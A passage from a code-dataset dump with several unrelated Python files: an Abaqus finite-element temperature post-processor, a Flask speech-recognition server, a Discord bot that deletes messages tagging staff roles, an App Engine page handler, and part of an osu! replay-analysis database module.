*(1+r)*(1-s)*(1+t)\r\n \r\n N7 = oneO8 *(1+r)*(1+s)*(1+t)\r\n \r\n N8 = oneO8 *(1-r)*(1+s)*(1+t)\r\n \r\n vec_shape = np.zeros((1,8)) \r\n vec_shape[0] = [N1,N2,N3,N4,N5,N6,N7,N8]\r\n \r\n dN1dr = oneO8 *(-one)*(1-s)*(1-t)\r\n dN1ds = oneO8 *(1-r)*(-one)*(1-t)\r\n dN1dt = oneO8 *(1-r)*(1-s)*(-one)\r\n \r\n dN2dr = oneO8 *(one)*(1-s)*(1-t)\r\n dN2ds = oneO8 *(1+r)*(-one)*(1-t)\r\n dN2dt = oneO8 *(1+r)*(1-s)*(-one)\r\n \r\n dN3dr = oneO8 *(one)*(1+s)*(1-t)\r\n dN3ds = oneO8 *(1+r)*(one)*(1-t)\r\n dN3dt = oneO8 *(1+r)*(1+s)*(-one)\r\n \r\n dN4dr = oneO8 *(-one)*(1+s)*(1-t)\r\n dN4ds = oneO8 *(1-r)*(one)*(1-t)\r\n dN4dt = oneO8 *(1-r)*(1+s)*(-one)\r\n \r\n dN5dr = oneO8 *(-one)*(1-s)*(1+t)\r\n dN5ds = oneO8 *(1-r)*(-one)*(1+t)\r\n dN5dt = oneO8 *(1-r)*(1-s)*(one)\r\n \r\n dN6dr = oneO8 *(one)*(1-s)*(1+t)\r\n dN6ds = oneO8 *(1+r)*(-one)*(1+t)\r\n dN6dt = oneO8 *(1+r)*(1-s)*(one)\r\n \r\n dN7dr = oneO8 *(one)*(1+s)*(1+t)\r\n dN7ds = oneO8 *(1+r)*(one)*(1+t)\r\n dN7dt = oneO8 *(1+r)*(1+s)*(one)\r\n \r\n dN8dr = oneO8 *(-one)*(1+s)*(1+t)\r\n dN8ds = oneO8 *(1-r)*(one)*(1+t)\r\n dN8dt = oneO8 *(1-r)*(1+s)*(one)\r\n \r\n MAT_diff = np.zeros((8,3))\r\n \r\n MAT_diff[0] = [ dN1dr , dN1ds , dN1dt ]\r\n MAT_diff[1] = [ dN2dr , dN2ds , dN2dt ]\r\n MAT_diff[2] = [ dN3dr , dN3ds , dN3dt ]\r\n MAT_diff[3] = [ dN4dr , dN4ds , dN4dt ]\r\n MAT_diff[4] = [ dN5dr , dN5ds , dN5dt ]\r\n MAT_diff[5] = [ dN6dr , dN6ds , dN6dt ]\r\n MAT_diff[6] = [ dN7dr , dN7ds , dN7dt ]\r\n MAT_diff[7] = [ dN8dr , dN8ds , dN8dt ]\r\n\r\n self.shapefun = vec_shape\r\n self.shape_diff = MAT_diff\r\n \r\n def JACOBIAN(self):\r\n# NODE_COORD.X = x coordinates \r\n if self.DIMENSION == 3:\r\n JACOBIAN = np.zeros((3,3))\r\n for i in range(0,3):\r\n somax = 0.0\r\n somay = 0.0\r\n somaz = 0.0\r\n for k in range(0,self.number_nodes):\r\n aux = self.X[k]*self.shape_diff[k][i]\r\n somax = somax + aux\r\n \r\n aux = self.Y[k]*self.shape_diff[k][i]\r\n somay = somay + aux\r\n \r\n aux = self.Z[k]*self.shape_diff[k][i]\r\n somaz = somaz + aux\r\n \r\n JACOBIAN[i,0] = somax\r\n JACOBIAN[i,1] = somay\r\n JACOBIAN[i,2] = somaz\r\n \r\n self.detJACOBIAN = np.linalg.det(JACOBIAN)\r\n \r\n \r\n def TEMPERATURE_RST(self):\r\n TEMP_RST = 0.0\r\n for i in range(0,len(self.TEMP_NODAL)):\r\n TEMP_RST = TEMP_RST + self.TEMP_NODAL[i]*self.shapefun[0][i]\r\n self.TEMP_RST = TEMP_RST\r\n \r\n def FUNCTION_INTEGRATED_RST(self,r,s,t):\r\n \r\n self.brick_element(r,s,t) #changes shapefun and diff shapefun\r\n \r\n self.JACOBIAN() #calculates Jacobian at new r,s,t\r\n \r\n self.TEMPERATURE_RST()\r\n \r\n f = self.TEMP_RST*abs(self.detJACOBIAN)\r\n \r\n return f\r\n#------------------------------------------------------------------------------\r\nclass GAUSS_POINTS:\r\n def __init__(self, npoints):\r\n self.points = npoints\r\n \r\n #W = weight\r\n #P = point\r\n if npoints == 2:\r\n self.W = [1.0,1.0]\r\n \r\n root3 = math.sqrt(3)\r\n self.P = [-1/root3, 1/root3]\r\n \r\n elif npoints == 1:\r\n self.W = [2.0]\r\n self.P = [0.0]\r\n \r\n elif npoints == 3:\r\n root3 = math.sqrt(3)\r\n root5 = math.sqrt(5)\r\n \r\n fiveOnine = 5./9.\r\n \r\n self.W = [fiveOnine, 8./9., fiveOnine]\r\n self.P = [-root3/root5,0.0, root3/root5]\r\n \r\n#==============================================================================\r\n# QUAD GAUSS 2D OR 3D\r\n#==============================================================================\r\ndef gauss_quad(DIM,func_name):\r\n Nx = 3\r\n Ny = 3\r\n Nz = 3\r\n \r\n X = GAUSS_POINTS(Nx)\r\n Y = GAUSS_POINTS(Ny)\r\n Z = GAUSS_POINTS(Nz)\r\n \r\n sum_gauss = 0.0\r\n \r\n if DIM == 2:\r\n for j in range(0,Ny):\r\n \r\n p_x2 = Y.P[j]\r\n w_x2 = Y.W[j]\r\n \r\n for i in range(0,Nx):\r\n p_x1 = X.P[i]\r\n w_x1 = X.W[i]\r\n \r\n point = (p_x1,p_x2)\r\n \r\n f = func_name(point)\r\n \r\n sum_gauss = sum_gauss + w_x1*f\r\n \r\n sum_gauss = sum_gauss * w_x2\r\n \r\n elif DIM == 3:\r\n for k in range(0,Nz):\r\n p_x3 = Z.P[k]\r\n w_x3 = Z.W[k]\r\n \r\n aux_gauss_j = 0.0\r\n for j in range(0,Ny):\r\n p_x2 = Y.P[j]\r\n w_x2 = Y.W[j]\r\n \r\n aux_gauss_i = 0.0\r\n for i in range(0,Nx):\r\n p_x1 = X.P[i]\r\n w_x1 = X.W[i]\r\n \r\n point = (p_x1,p_x2,p_x3)\r\n \r\n f = func_name(p_x1,p_x2,p_x3)\r\n \r\n aux_gauss_i = aux_gauss_i + w_x1*f\r\n \r\n aux_gauss_j = aux_gauss_j + aux_gauss_i * w_x2\r\n sum_gauss = sum_gauss + aux_gauss_j* w_x3\r\n \r\n \r\n return sum_gauss\r\n \r\n#------------------------------------------------------------------------------ \r\n#==============================================================================\r\n# WRITING VECTORS OF NODAL X, Y AND Z\r\n#==============================================================================\r\ndef rewrite_vec_pos(newnodes,ELE_TYPE):\r\n vecX = list()\r\n vecY = list()\r\n vecZ = list()\r\n for i in range(0,ELE_TYPE):\r\n node_i = newnodes[i]\r\n \r\n vecX.append(node_i[0])\r\n vecY.append(node_i[1])\r\n vecZ.append(node_i[2])\r\n \r\n return vecX,vecY,vecZ\r\n \r\n#==============================================================================\r\n# CALCULATE DISTANCE BETWEEN 2 POINTS\r\n#==============================================================================\r\ndef distance(coord1,coord2):\r\n aux = 0.0\r\n for i in range(0,len(coord1)):\r\n aux_i = (coord1[i] - coord2[i])**2\r\n aux = aux + aux_i\r\n \r\n dist = math.sqrt(aux)\r\n return dist\r\n \r\n#==============================================================================\r\n# CALCULATING NEW COORDINATES FOR EACH ELEMENT\r\n#==============================================================================\r\ndef ELEMENT_DATA(Instance,R_table,table_nodes,table_CONEC,ele_number,ELE_TYPE):\r\n #Instance = number of the instance\r\n\r\n translate = R_table[Instance - 1] #translation vector\r\n\r\n NODES = table_CONEC[ele_number - 1] #node number of the current element\r\n \r\n new_coordinates = list() #coordinates of each node of the current element\r\n \r\n for i in range(0,ELE_TYPE):\r\n \r\n node_i = int(NODES[i])\r\n \r\n coord_i = table_nodes[node_i - 1] #coordinate of node _i\r\n \r\n aux_coord = list()\r\n for j in range(0,3):\r\n aux = float(coord_i[j]) + translate[j]\r\n \r\n aux_coord.append(aux)\r\n \r\n new_coordinates.append(aux_coord)\r\n \r\n lx = distance(new_coordinates[1],new_coordinates[2])\r\n ly = distance(new_coordinates[1],new_coordinates[0])\r\n lz = distance(new_coordinates[0],new_coordinates[4])\r\n \r\n Vol = lx * ly * lz #element volume\r\n \r\n return new_coordinates, Vol\r\n \r\n#==============================================================================\r\n# READING INP FILE\r\n#==============================================================================\r\ndef read_inp(name_file_inp): \r\n file_read = open(name_file_inp, 'r');#READS THE INP FILE\r\n \r\n ELE_TYPE = 8 #NUMBER OF NODES PER ELEMENT\r\n #JUMPING LINES\r\n for i in range(0,9):\r\n file_read.readline()\r\n \r\n #READING NODES -----------------------------------------------------------\r\n aux_stop = \"t\";\r\n \r\n table_nodes = list()\r\n while aux_stop != \"*\":\r\n node_aux = file_read.readline()\r\n aux_stop = node_aux[0]\r\n node_aux = node_aux.replace(\",\", \"\")\r\n node_aux = node_aux.split();\r\n table_nodes.append(node_aux[1:4])\r\n \r\n del table_nodes[-1] #DELETE LAST ELEMENT\r\n NUMBER_NODES = len(table_nodes)\r\n \r\n #------------------------------------------------------------------------------\r\n #READING ELEMENTS--------------------------------------------------------------\r\n aux_stop = \"t\";\r\n \r\n table_CONEC = list()\r\n while aux_stop != \"*\":\r\n ele_aux = file_read.readline()\r\n aux_stop = ele_aux[0]\r\n ele_aux = ele_aux.replace(\",\", \"\")\r\n ele_aux = ele_aux.split();\r\n while len(ele_aux) < (ELE_TYPE + 1):\r\n ele_aux2 = file_read.readline()\r\n ele_aux2 = ele_aux2.replace(\",\", \"\")\r\n ele_aux2 = ele_aux2.split();\r\n ele_aux = ele_aux + ele_aux2\r\n \r\n table_CONEC.append(ele_aux[1:ELE_TYPE+1])\r\n \r\n \r\n del table_CONEC[-1] #DELETE LAST ELEMENT\r\n NUMBER_ELE = len(table_CONEC) #ELEMENTS PER INSTANCE\r\n \r\n #------------------------------------------------------------------------------\r\n #READING THE VECTOR R OF ASSEMBLY\r\n aux_stop = \"t\";\r\n \r\n while aux_stop != \"*Instance, name=I-1\":\r\n aux_stop = file_read.readline()\r\n aux_stop = aux_stop[0:19]\r\n \r\n aux_stop = \"*I\"\r\n R_table = list()\r\n LAYER_INSTANCE = list() #LIST THAT SAYS WHICH LAYER EACH INSTANCE IS AT\r\n LAYER_INSTANCE.append(1) #FIRST INSTANCE = LAYER 1\r\n aux_instance_layer = 0.0\r\n layer_cont = 1\r\n while aux_stop == \"*I\":\r\n file_read.readline()\r\n file_read.readline()\r\n \r\n aux_stop = file_read.readline()\r\n aux_stop = aux_stop[0:2]\r\n \r\n coord_R = file_read.readline()\r\n coord_R = coord_R.replace(\",\", \"\")\r\n coord_R = coord_R.split();\r\n \r\n for i in range(0,3):\r\n coord_R[i] = float(coord_R[i])\r\n \r\n #CHECKING THE LAYER INSTANCES\r\n if float(coord_R[2]) > aux_instance_layer:\r\n aux_instance_layer = float(coord_R[2])\r\n layer_cont = layer_cont + 1\r\n \r\n LAYER_INSTANCE.append(layer_cont)\r\n R_table.append(coord_R)\r\n \r\n del R_table[-1] #DELETE LAST ELEMENT\r\n del LAYER_INSTANCE[-1] #DELETE LAST ELEMENT\r\n NUMBER_LAYER = max(LAYER_INSTANCE) #NUMBER OF LAYERS\r\n R_table.insert(0,[0.0, 0.0, 0.0]) #FIRST INTANCE R = [0 0 0]\r\n NUMBER_INSTANCE = len(R_table)\r\n NUMBER_ELE = len(table_CONEC) #ELEMENTS PER INSTANCE\r\n file_read.close()\r\n \r\n return R_table, table_nodes, table_CONEC\r\n\r\n#==============================================================================\r\n# READ ODB\r\n#==============================================================================\r\ndef read_odb(i,name_old,num_steps,num_instances,print_pattern,ELE_TYPE,R_table,table_nodes,table_CONEC,BRICK):\r\n \r\n myOdb = odbAccess.openOdb(path=name_old, readOnly = True)\r\n \r\n ALLInstances = myOdb.rootAssembly.instances\r\n \r\n \r\n name_new = name_old.replace('.odb','_%d.txt' %(i+1))\r\n \r\n report_name = 'report-%d.txt' %(i+1)\r\n \r\n file_report = open(report_name,'w')\r\n file_report.close()\r\n #RESTART:\r\n aux_restart = 0 #DOES NOT RESTART\r\n \r\n if os.path.isfile(name_new): #it file exists\r\n file_new = open(name_new,'r')\r\n \r\n cont_line = 0\r\n \r\n for line in file_new:\r\n cont_line = cont_line + 1\r\n \r\n file_new.close()\r\n if cont_line < 14:\r\n aux_restart = 1\r\n \r\n if not os.path.isfile(name_new) or aux_restart == 1: #it file does not exists or has not been written entirely\r\n file_new = open(name_new,'w')\r\n \r\n total_time = 0.0\r\n \r\n \r\n if i == num_steps - 1: #last step\r\n step_name = 'Step-FINAL-THERMAL-STEP'\r\n num_instance_now = num_instances\r\n else: \r\n step_name = 'Step-%d' %(i+1)\r\n num_instance_now = i + 1\r\n \r\n step_now = myOdb.steps[step_name]\r\n num_frames = len(step_now.frames)\r\n \r\n file_new.write(\"--------------------------------------------------\\n\")\r\n file_new.write(\"%s\\n\" %step_name)\r\n \r\n for j in range(0,num_frames):\r\n frame_now = step_now.frames[j]\r\n \r\n time_step = frame_now.frameValue\r\n total_time = total_time + time_step\r\n \r\n TEMP_aux = frame_now.fieldOutputs['TEMP'] \r\n \r\n file_new.write(\"FRAME = %d ----------------------------------------\\n\" %j)\r\n file_new.write(\"TIME [s] = %f\\n\" %total_time)\r\n \r\n cont_ele = 0 #global elements\r\n \r\n Vol_total = 0.0 #volume total is zeroed in each frame\r\n \r\n Int_temp_total = 0.0 #integration sum variable is zeroed in each frame\r\n \r\n file_new_frame = name_new.replace('.txt','') + 'F%d.txt' %(j)\r\n \r\n for k in range(1,num_instance_now+1):\r\n \r\n intance_number = print_pattern[k-1]\r\n \r\n file_name_new_I = file_new_frame.replace('.txt','') + '_I%d.txt' %(intance_number)\r\n file_new_I = open(file_name_new_I,'w')\r\n \r\n instanceName = 'I-%d' %intance_number\r\n \r\n myInstance = ALLInstances[instanceName]\r\n \r\n numElements = len(myInstance.elements)\r\n \r\n Vol_total = 0.0 #volume total is zeroed in each frame\r\n \r\n Int_temp_total = 0.0 #integration sum variable is zeroed in each frame\r\n \r\n for el in range(0,numElements):\r\n #Isolate current and previous element's stress field\r\n \r\n #THOSE RESULTS ARE NO AVERAGED\r\n #POSITION = INTEGRATION_POINT/ELEMENT_NODAL/CENTROID\r\n region_aux = myInstance.elements[el]\r\n \r\n TEMP_NODAL = TEMP_aux.getSubset(\r\n region=region_aux,position=ELEMENT_NODAL,elementType='DC3D8').values\r\n \r\n cont_ele = cont_ele +1\r\n \r\n local_ele = el+1\r\n \r\n TEMP_NODE_ip = list()\r\n \r\n for ip in range(0,ELE_TYPE): #node loop\r\n \r\n TEMP_NODE_ip.append(TEMP_NODAL[ip].data)\r\n \r\n \r\n (new_coordinates, Vol) = ELEMENT_DATA(intance_number,R_table,table_nodes,table_CONEC,local_ele,ELE_TYPE) \r\n \r\n Vol_total = Vol_total + Vol\r\n \r\n #Post-Processing ----------------------------------------------\r\n (vecX,vecY,vecZ) = rewrite_vec_pos(new_coordinates,ELE_TYPE)\r\n \r\n BRICK.natural_nodes(vecX, vecY, vecZ)\r\n \r\n BRICK.nodal_temperature(TEMP_NODE_ip)\r\n \r\n # print BRICK.nodal_temperature\r\n \r\n #Integrating temperature distribution within the element\r\n Iaux = gauss_quad(BRICK.DIMENSION,BRICK.FUNCTION_INTEGRATED_RST)\r\n Int_temp_total = Int_temp_total + Iaux\r\n \r\n \r\n file_new_I.write(\"Integral Volume\\n\")\r\n file_new_I.write('%f %E\\n'%(Int_temp_total/Vol_total,Vol_total))\r\n file_new_I.close()\r\n\r\n file_new.close()\r\n myOdb.close()\r\n#------------------------------------------------------------------------------ \r\n\r\nif __name__ == '__main__': \r\n \r\n ELE_TYPE = 8\r\n pool = Pool(processes=20)\r\n #Odb file in the work directory:\r\n odb_name = 'job_sim1_mesh_2_2_2.odb' \r\n \r\n myOdb = odbAccess.openOdb(path=odb_name, readOnly = True)\r\n #--------------------------------------------------------------------------\r\n \r\n ALLInstances = myOdb.rootAssembly.instances\r\n num_instances = len(ALLInstances)\r\n \r\n mysteps = myOdb.steps\r\n num_steps = len(mysteps)\r\n# myOdb.close()\r\n \r\n #==========================================================================\r\n # Reading report file\r\n #========================================================================== \r\n report_file_name = 'REPORT_sim1_mesh_2_2_2.txt'\r\n file_report = open(report_file_name,'r')\r\n \r\n print_pattern = list()\r\n \r\n for i in range(0,24):\r\n file_report.readline() #jumping lines\r\n for i in range(0,num_instances):\r\n print_pattern.append(int(file_report.readline()))\r\n \r\n file_report.close() \r\n \r\n \r\n #--------------------------------------------------------------------------\r\n \r\n #==============================================================================\r\n #READING INP FILE\r\n #==============================================================================\r\n name_file_inp = 'job_sim1_mesh_2_2_2.inp' #INP FILE OF THE ANALYSIS(MUST CONTAIN THE ASSEMBLY)\r\n R_table, table_nodes, table_CONEC = read_inp(name_file_inp)\r\n \r\n\r\n # -------------------------------------------------------------------------\r\n # POST-PROCESSING\r\n BRICK = SHAPE_FUNCTIONS(3,8)\r\n \r\n #Parallel processing\r\n inputs = range(num_steps)\r\n# inputs = range(1)\r\n aux = pool.map(partial(read_odb, name_old=odb_name, num_steps = num_steps,num_instances=num_instances, \r\n print_pattern=print_pattern,ELE_TYPE=ELE_TYPE,R_table=R_table,table_nodes=table_nodes,table_CONEC=table_CONEC,BRICK=BRICK), inputs)\r\n \r\n myOdb.close()","sub_path":"Parallel_processing_Temperature.py","file_name":"Parallel_processing_Temperature.py","file_ext":"py","file_size_in_byte":20067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"547879389","text":"from flask import Flask, render_template, request, jsonify\nfrom flask.ext.socketio import SocketIO, emit, session\nfrom background_asr import recognize_wav\nfrom online_asr import OnlineASR\n\napp = Flask(__name__)\napp.config.from_object(__name__)\nsocketio = SocketIO(app)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/recognize', methods=['POST'])\ndef recognize():\n response = recognize_wav(request.data)\n\n return jsonify(response)\n\n\n@socketio.on('begin')\ndef begin_recognition(message):\n session['recognizer'] = OnlineASR(emit)\n\n\n@socketio.on('chunk')\ndef recognize_chunk(message):\n session['recognizer'].recognize_chunk(message)\n\n\n@socketio.on('end')\ndef end_recognition(message):\n session['recognizer'].end()\n\n\nif __name__ == '__main__':\n app.secret_key = 12345\n socketio.run(app)\n","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"653088529","text":"#!/usr/local/bin/python3\nimport discord\nfrom discord.ext import commands\nimport asyncio\nimport os\n\nbot = commands.Bot(command_prefix='!')\n\nwith open(f'{os.getcwd()}/token.txt', 'r') as token_file:\n bot.token = token_file.read().strip()\n\nwith open (f'{os.getcwd()}/bad_roles.txt') as bad_role_file:\n bad_roles = bad_role_file.readlines()\n bot.bad_role_list = []\n for line in bad_roles:\n bot.bad_role_list.append(line.strip().lower())\n\nwith open (f'{os.getcwd()}/excluded_roles.txt') as excluded_role_file:\n excluded_roles = excluded_role_file.readlines()\n bot.excluded_role_list = []\n for line in excluded_roles:\n bot.excluded_role_list.append(line.strip().lower())\n\nprint(bot.excluded_role_list)\n\n@bot.event\nasync def on_ready():\n print('------')\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n\n@bot.event\nasync def on_message(message):\n if not message.author.bot:\n if check_if_user_mentioned_bad_role(message):\n if not check_if_user_has_excluded_role(message):\n await message.delete()\n await message.channel.send(f'{message.author.mention}\\n**#11** - __Do not tag **Event-OPs or Above**__\\n- If you need them, please wait in the support room for assistance.', delete_after=5)\n await asyncio.sleep(5)\n #await message.author.kick(reason='Tagging Staff')\n\ndef check_if_user_mentioned_bad_role(message):\n for mentioned_player in message.mentions:\n for roles in mentioned_player.roles:\n if roles.name in bot.bad_role_list:\n return True\n return False\n\ndef check_if_user_has_excluded_role(message):\n for roles in message.author.roles:\n if roles.name in bot.excluded_role_list:\n return True\n return False\n\nbot.run(bot.token)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"86246839","text":"import webapp2\nimport os\nfrom google.appengine.ext.webapp import template\n\n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n \n folder = 'htm'\n file = 'home.htm'\n template_values = {'page': 'home'}\n\n path = os.path.join(folder, file)\n \n self.response.out.write(template.render(path, template_values))\n\nclass OutHandler(webapp2.RequestHandler):\n def get(self):\n \n url = self.request.get('url')\n \n folder = 'htm'\n file = 'out.htm'\n template_values = {'url': url}\n\n path = os.path.join(folder, file)\n \n self.response.out.write(template.render(path, template_values))\n\nclass GalleryHandler(webapp2.RequestHandler):\n def get(self):\n \n folder = 'htm'\n file = 'gallery.htm'\n template_values = {'page': 'gallery'}\n\n path = os.path.join(folder, file)\n \n self.response.out.write(template.render(path, template_values))\n\napp = webapp2.WSGIApplication([\n ('/out/.*', OutHandler),\n ('/gallery/.*', GalleryHandler),\n ('/.*', MainHandler)\n], debug=True)","sub_path":"trueamericanrulescom/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"138041823","text":"\"\"\"\nA module to handle queries on the DB.\n\"\"\"\n\nfrom decimal import Decimal\nfrom requests import get\n\nfrom osu_acc.replay import util\nfrom osu_acc.replay import classes\nfrom osu_acc.replay.models import Replay, ReplayData\nfrom osu_acc.beatmap.models import Beatmap, BreakPeriod, TimingPoint, HitObject\n\n\n# =============================================================================\n# REPLAY MODELS\n# =============================================================================\n\ndef create_replay_data_entry(replay_id, replay_events):\n \"\"\"\n Given a list of classes.ReplayEvents, create and save a models.ReplayData instance.\n\n Args:\n replay_events (List(classes.ReplayEvent)): The replay data.\n \"\"\"\n if ReplayData.objects.filter(replay_id=replay_id).exists():\n return\n\n replay_data_fields = {}\n\n replay_data_fields['replay_id'] = replay_id\n replay_data_fields['x_coords'] = []\n replay_data_fields['y_coords'] = []\n replay_data_fields['hit_object_times'] = []\n\n for replay_event in replay_events:\n replay_data_fields['x_coords'].append(replay_event.x)\n replay_data_fields['y_coords'].append(replay_event.y)\n replay_data_fields['hit_object_times'].append(replay_event.time)\n\n replay_data_entry = ReplayData(**replay_data_fields)\n replay_data_entry.save()\n\n\ndef select_replay_data_field(replay_id, field):\n \"\"\"\n Returns the value of the field of a specific ReplayData entry.\n\n Equivalent to: SELECT field FROM replay_replaydata WHERE replay_id = replay_id;\n\n Args:\n replay_id (str): The hash of the replay, given by osrparse.\n\n Returns:\n field: The field requested.\n Is of type: str, List(Decimal).\n \"\"\"\n\n valid_keys = set([\n 'x_coords',\n 'y_coords',\n 'hit_object_times',\n ])\n\n if field not in valid_keys:\n # Raise a proper exception\n return None\n\n replay = Replay.objects.get(replay_id=replay_id)\n return getattr(replay, field)\n\n\ndef create_replay_entry(json_resp, parsed_replay):\n \"\"\"\n Create and save a Replay instance.\n\n Args:\n json_resp (dict): The result of the osu!api call as a dictionary.\n parsed_replay (osrparse.Replay): The parsed replay.\n \"\"\"\n\n if Replay.objects.filter(replay_id=parsed_replay.replay_hash).exists():\n return\n\n replay_fields = {}\n\n # GETTING ARGUMENTS AND CONVERTING TYPES\n circle_size = Decimal(json_resp['diff_size'])\n overall_diff = Decimal(json_resp['diff_overall'])\n break_periods_model = select_beatmap_field(json_resp['beatmap_id'], 'break_period')\n break_periods = util.convert_beatmap_break_periods_to_class(break_periods_model)\n replay_events = util.convert_osrp_play_data_to_class(parsed_replay.play_data)\n hit_objects_model = select_beatmap_field(json_resp['beatmap_id'], 'hit_object')\n hit_objects = util.convert_hit_object_model_to_class(hit_objects_model)\n\n # POPULATING FIELD DICTIONARY\n replay_fields['replay_id'] = parsed_replay.replay_hash\n replay_fields['beatmap'] = Beatmap.objects.get(beatmap_id=json_resp['beatmap_id'])\n replay_fields['play_date'] = parsed_replay.timestamp\n\n replay_fields['ap'] = 0.00\n replay_fields['pp'] = 0.00\n\n replay_fields['num_raw_300'] = parsed_replay.number_300s\n replay_fields['num_raw_100'] = parsed_replay.number_100s\n replay_fields['num_raw_50'] = parsed_replay.number_50s\n replay_fields['num_raw_miss'] = parsed_replay.misses\n replay_fields['raw_accuracy'] = util.get_accuracy(replay_fields['num_raw_300'],\n replay_fields['num_raw_100'],\n replay_fields['num_raw_50'],\n replay_fields['num_raw_miss'])\n\n\n true_acc_fields = util.get_true_accuracy_fields(circle_size,\n overall_diff,\n break_periods,\n replay_events,\n hit_objects)\n replay_fields = {**replay_fields, **true_acc_fields}\n replay_fields['true_accuracy'] = util.get_accuracy(replay_fields['num_true_300'],\n replay_fields['num_true_100'],\n replay_fields['num_true_50'],\n replay_fields['num_true_miss'])\n\n create_replay_data_entry(parsed_replay.replay_hash, replay_events)\n replay_fields['replay_data'] = ReplayData.objects.get(replay_id=parsed_replay.replay_hash)\n\n replay_fields['hit_errors'] = util.get_hit_errors(circle_size,\n overall_diff,\n break_periods,\n replay_events,\n hit_objects)\n\n hit_error_data = util.calc_hit_error_data(replay_fields['hit_errors'])\n replay_fields = {**replay_fields, **hit_error_data}\n\n # Create an instance of a Replay model\n replay_entry = Replay(**replay_fields)\n replay_entry.save()\n\n\ndef select_replay_field(replay_id, field):\n \"\"\"\n Returns the value of the field of a specific Replay entry.\n\n Equivalent to: SELECT field FROM replay_replay WHERE replay_id = replay_id;\n\n Args:\n replay_id (str): The hash of the replay, given by osrparse.\n\n Returns:\n query_set[field]: The field requested.\n Is of type: str, Beatmap, DateTime, Decimal, int, List(Decimal)\n \"\"\"\n\n valid_keys = set([\n 'beatmap',\n 'replay_data',\n 'play_date',\n 'pp',\n 'raw_accuracy',\n 'num_raw_300',\n 'num_raw_100',\n 'num_raw_50',\n 'num_raw_miss',\n 'ap',\n 'true_accuracy',\n 'num_true_300',\n 'num_true_100',\n 'num_true_50',\n 'num_true_miss',\n 'hit_errors',\n 'min_neg_hit_error',\n 'max_neg_hit_error',\n 'avg_neg_hit_error',\n 'min_pos_hit_error',\n 'max_pos_hit_error',\n 'avg_pos_hit_error',\n 'min_abs_hit_error',\n 'max_abs_hit_error',\n 'avg_abs_hit_error',\n ])\n\n if field not in valid_keys:\n # Raise a proper exception\n return None\n\n replaydata = ReplayData.objects.get(replay_id=replay_id)\n return getattr(replaydata, field)\n\n\n# =============================================================================\n# BEATMAP MODELS\n# =============================================================================\n\n\ndef create_break_period_entry(bm_id, data):\n \"\"\"\n Create and save a BreakPeriod entry.\n\n Equivalent to: INSERT INTO beatmap_breakperiod (fields) VALUES (values);\n\n Args:\n bm_id (str): The id of the beatmap associated.\n data (List(str)): The beatmap data as a list of strings.\n\n Returns:\n break_period_entry(BreakPeriod): The created BreakPeriod instance.\n \"\"\"\n\n if BreakPeriod.objects.filter(beatmap_id=bm_id).exists():\n return\n\n # Syntax: 2,start,end\n # The start and end fields are both an integral number of milliseconds,\n # from the beginning of the song,\n # defining the start and end point of the break period, respectively.\n\n break_fields = {}\n break_fields['beatmap_id'] = bm_id\n break_fields['starts'] = []\n break_fields['ends'] = []\n\n is_break = False\n\n for line in data:\n if 'Break Periods' in line.strip():\n is_break = True\n continue\n\n if is_break:\n # Next subsection, storyboarding, begins with the line\n # '//Storyboard Layer 0 (Background)\\n'\n if 'Storyboard' in line.strip():\n is_break = False\n else:\n start = int(line.split(',')[1])\n break_fields['starts'].append(start)\n end = int(line.split(',')[2])\n break_fields['ends'].append(end)\n\n break_entry = BreakPeriod(**break_fields)\n break_entry.save()\n\n\ndef select_break_period_field(beatmap_id, field):\n \"\"\"\n Returns the value of the field of a specific Break entry.\n\n Equivalent to: SELECT field FROM beatmap_break WHERE beatmap_id = beatmap_id;\n\n Args:\n beatmap_id (str): The id of the beatmap, given by osu!api.\n\n Returns:\n field: The field requested.\n Is of type: List(int), List(Decimal).\n \"\"\"\n\n valid_keys = set(['starts', 'ends'])\n\n if field not in valid_keys:\n # TODO: Raise a proper exception.\n return None\n\n break_period = BreakPeriod.objects.get(beatmap_id=beatmap_id)\n return getattr(break_period, field)\n\n\ndef create_timing_point_entry(bm_id, data):\n \"\"\"\n Create and save a TimingPoint entry.\n\n Equivalent to: INSERT INTO beatmap_timingpoint (fields) VALUES (values);\n\n Args:\n bm_id (str): The id of the beatmap associated.\n data (List(str)): The beatmap data as a list of strings.\n\n Returns:\n timing_point_model(TimingPoint): The created TimingPoint instance.\n \"\"\"\n if TimingPoint.objects.filter(beatmap_id=bm_id).exists():\n return\n\n # Syntax: Offset, Milliseconds per Beat, Meter, \n # Sample Set, Sample Index, Volume, Inherited, Kiai Mode\n # For our purposes, we only need the first three fields.\n # We will also convert all ms/beat values to positive.\n timing_point_fields = {}\n timing_point_fields['beatmap_id'] = bm_id\n timing_point_fields['offsets'] = []\n timing_point_fields['ms_per_beats'] = []\n\n is_timing_point = False\n\n for line in data:\n if line.strip() == '[TimingPoints]':\n is_timing_point = True\n continue\n\n if is_timing_point:\n # There is always an empty line before the start of the next section\n # Use it to identify when the current section ends\n if not line.strip():\n is_timing_point = False\n else:\n offset = int(line.split(',')[0])\n timing_point_fields['offsets'].append(offset)\n ms_per_beat = Decimal(line.split(',')[1])\n timing_point_fields['ms_per_beats'].append(round(ms_per_beat, 2))\n\n timing_point_entry = TimingPoint(**timing_point_fields)\n timing_point_entry.save()\n\n\ndef select_timing_point_field(beatmap_id, field):\n \"\"\"\n Returns the value of the field of a specific TimingPoint entry.\n\n Equivalent to: SELECT field FROM beatmap_timingpoint WHERE beatmap_id = beatmap_id;\n\n Args:\n beatmap_id (str): The id of the beatmap, given by osu!api.\n\n Returns:\n field: The field requested.\n Is of type: List(int), List(Decimal).\n \"\"\"\n\n valid_keys = set([\n 'offsets',\n 'ms_per_beats',\n ])\n\n if field not in valid_keys:\n # Raise a proper exception\n return None\n\n timingpoint = TimingPoint.objects.get(beatmap_id=beatmap_id)\n return getattr(timingpoint, field)\n\n\ndef 